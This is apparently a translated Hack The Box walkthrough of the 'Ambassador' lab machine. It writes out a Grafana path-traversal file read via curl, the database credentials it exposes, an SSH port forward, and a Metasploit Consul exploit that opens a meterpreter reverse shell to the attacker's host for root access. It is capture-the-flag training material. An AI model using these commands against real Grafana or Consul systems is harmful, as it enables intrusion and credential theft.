Article directory
Preface
Difficulty: Moderate, Hack The Box website online shooting drone. The knowledge points involved in this article include: reading arbitrary files in the Grafana system, downloading files with CURL, SSL local port forwarding, and Consul command execution.
Target drone address: 10.10.11.183
kali address: 10.10.14.26
1. Web part
1) Select the medium difficulty on the active machines page and select the first Ambassador drone.
2) Since it is a target machine, all ports are scanned directly. At the same time, Fscan scans it first. The presence of port 22 indicates that it is a Linux host. There are ports 80, 3000 for the Grafana system, and port 3306.
nmap -T4 -p- 10.10.11.183
3) The result of Fscan is that there are no weak passwords in SSH and MySQL.
./fscan_amd64 -h 10.10.11.183
4) After accessing port 3000, it was found that it was the Grafana system. The first attempt to use a weak password failed. Then, we searched for historical vulnerabilities and found an arbitrary file reading vulnerability, but the exploitation failed.
5) Take a look at port 3306 + phpMyAdmin. It’s garbled, but you can probably tell the operating system version.
6) Access port 80: http://10.10.11.183/, the prompt says to use a developer account for SSH, DevOps will provide you with the password. If you don’t understand, leave it alone!
7) Directory scanning was performed, but no valid information was found.
8) At a deadlock, I tried to exploit grafana’s vulnerability again, this time using searchexploit query. Search for grafana, then select the payload read from any file and copy it to the current desktop, then use it, and then it works! ! !
searchsploit grafana
searchsploit -m multiple/webapps/50581.py
python3 50581.py -H http://10.10.11.183:3000
9) To read any file, read the configuration file first. A Google search found that the configuration file is: /etc/grafana/grafana.ini
10) The amount of data is too much. Let’s download it directly.
curl --path-as-is http://10.10.11.183:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db
11) According to the prompts in the grafana.ini file: mysql, postgres, and sqlite3 can all be opened. We opened it with sqlite3 and successfully found out the account and credentials of the MySQL database: grafana/dontStandSoCloseToMe63221! 12) After connecting to the database, check the current user and
find The account password is: developer/anEnglishManInNewYork027468.
13) Follow the prompts on the port 80 page and use your account and password to log in to the SSH server.
2. Rights escalation part
1) It can be seen that the kernel version cannot be used to escalate privileges.
2) It is also impossible to use sudo and suid to escalate privileges.
sudoedit -s /
find / -user root -perm -4000 -print 2>/dev/null
3) Unable to use scheduled tasks to escalate privileges, and others.
4) Check tmp opt and so on in the regular directory. There are two folders in opt. Among them, there is a git file in the my-app file. You can check the git log and find that a consul service is running. I don’t understand Baidu.
5) It was discovered that there is a remote command execution vulnerability and it exists on MSF, and then various exploits failed.
6) Find the reason. The error is that there is an error when connecting to the cosul API. After searching for the information, it is found that there is no 8500 port. I directly use SSL to do a local port forwarding and forward the 8500 port of the target machine to the local 8500 port.
ssh -L 8500:0.0.0.0:8500 developer@10.10.11.183 #然后输入密码
7) Then use MSF to directly rebound the shell, with root permissions.
msfconsole -q -x "use multi/misc/consul_service_exec;
set payload linux/x86/meterpreter/reverse_tcp;
set rhosts 127.0.0.1;
set lhost 10.10.14.26;
# 此处的acl_token在第4段的第二张图最下方
set acl_token bb03b43b-1d81-d62b-24b5-39540ee469b5;
set lport 4444; exploit"